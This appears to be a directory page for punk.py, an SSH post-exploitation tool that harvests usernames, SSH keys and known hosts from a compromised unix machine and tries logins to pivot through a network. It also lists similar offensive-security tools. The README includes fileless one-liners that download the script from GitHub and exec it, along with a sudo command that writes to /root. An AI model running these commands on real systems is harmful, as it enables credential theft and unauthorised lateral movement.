r3vn / Punk.py
Licence: gpl-3.0
unix SSH post-exploitation 1337 tool
Stars: ✭ 107
Programming Languages
python
139335 projects - #7 most used programming language
Projects that are alternatives of or similar to Punk.py
Bifrost
Bifrost C2. Open-source post-exploitation using Discord API
Stars: ✭ 37 (-65.42%)
Mutual labels: post-exploitation, offensive-security, pentest-tool
Oscp Pentest Methodologies
备考 OSCP 的各种干货资料/渗透测试干货资料
Stars: ✭ 166 (+55.14%)
Mutual labels: penetration-testing, pentest-tool, post-exploitation
Badkarma
network reconnaissance toolkit
Stars: ✭ 353 (+229.91%)
Mutual labels: penetration-testing, pentest-tool, offensive-security
ligolo-ng
An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.
Stars: ✭ 418 (+290.65%)
Mutual labels: post-exploitation, offensive-security, pentest-tool
Blackmamba
C2/post-exploitation framework
Stars: ✭ 544 (+408.41%)
Mutual labels: pentest-tool, post-exploitation, offensive-security
Passhunt
Passhunt is a simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords.
Stars: ✭ 961 (+798.13%)
Mutual labels: penetration-testing, pentest-tool
Eyes
👀 🖥️ Golang rewrite of eyes.sh. Let's you perform domain/IP address information gathering. Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?" 🔍 🕵️
Stars: ✭ 38 (-64.49%)
Mutual labels: penetration-testing, pentest-tool
Fuxi
Penetration Testing Platform
Stars: ✭ 1,103 (+930.84%)
Mutual labels: penetration-testing, pentest-tool
One Lin3r
Gives you one-liners that aids in penetration testing operations, privilege escalation and more
Stars: ✭ 1,259 (+1076.64%)
Mutual labels: penetration-testing, pentest-tool
Hacker Roadmap
📌 Your beginner pen-testing start guide. A guide for amateur pen testers and a collection of hacking tools, resources and references to practice ethical hacking and web security.
Stars: ✭ 7,752 (+7144.86%)
Mutual labels: penetration-testing, post-exploitation
Gtfonow
Automatic privilege escalation for misconfigured capabilities, sudo and suid binaries
Stars: ✭ 68 (-36.45%)
Mutual labels: unix, post-exploitation
Thecollective
The Collective. A repo for a collection of red-team projects found mostly on Github.
Stars: ✭ 85 (-20.56%)
Mutual labels: penetration-testing, offensive-security
Babysploit
👶 BabySploit Beginner Pentesting Toolkit/Framework Written in Python 🐍
Stars: ✭ 883 (+725.23%)
Mutual labels: penetration-testing, pentest-tool
Pwncat
pwncat - netcat on steroids with Firewall, IDS/IPS evasion, bind and reverse shell, self-injecting shell and port forwarding magic - and its fully scriptable with Python (PSE)
Stars: ✭ 904 (+744.86%)
Mutual labels: penetration-testing, pentest-tool
Intersect 2.5
Post-Exploitation Framework
Stars: ✭ 59 (-44.86%)
Mutual labels: penetration-testing, post-exploitation
Awesome Oscp
A curated list of awesome OSCP resources
Stars: ✭ 804 (+651.4%)
Mutual labels: penetration-testing, offensive-security
Penetration Testing Cheat Sheet
Work in progress...
Stars: ✭ 69 (-35.51%)
Mutual labels: penetration-testing, offensive-security
Pentest Notes
Collection of Pentest Notes and Cheatsheets from a lot of repos (SofianeHamlaoui,dostoevsky,mantvydasb,adon90,BriskSec)
Stars: ✭ 89 (-16.82%)
Mutual labels: penetration-testing, offensive-security
Atomic Red Team Intelligence C2
ARTi-C2 is a post-exploitation framework used to execute Atomic Red Team test cases with rapid payload deployment and execution capabilities via .NET's DLR.
Stars: ✭ 87 (-18.69%)
Mutual labels: post-exploitation, offensive-security
Eyes.sh
Let's you perform domain/IP information gathering... in BASH! Wasn't it esr who said "With enough eyeballs, all your IP info are belong to us?"
Stars: ✭ 89 (-16.82%)
Mutual labels: penetration-testing, pentest-tool
punk.py
unix SSH post-exploitation 1337 tool
how it works
punk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on both standard python2 and python3 interpreters.
Screenshot
examples
standard execution:
~$ ./punk.py
skip passwd checks and use a custom home path:
~$ ./punk.py --no-passwd --home /home/ldapusers/
execute commands with sudo:
~$ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'"
cracking ssh hashed known hosts:
~$ ./punk.py --crack 192.168.0.0/24
python2 one-liner fileless ( with --no-passwd parameter ):
~$ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd
python3 one-liner fileless:
~$ python3 -c "import requests;exec(requests.get('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').text)"
TODO
- improve private keys hunting including dsa keys
- Recursion
- SSH keys with password bruteforce
Note that the project description data, including the texts, logos, images, and/or trademarks,
for each open source project belongs to its rightful owner.
If you wish to add or remove any projects, please contact us at [email protected].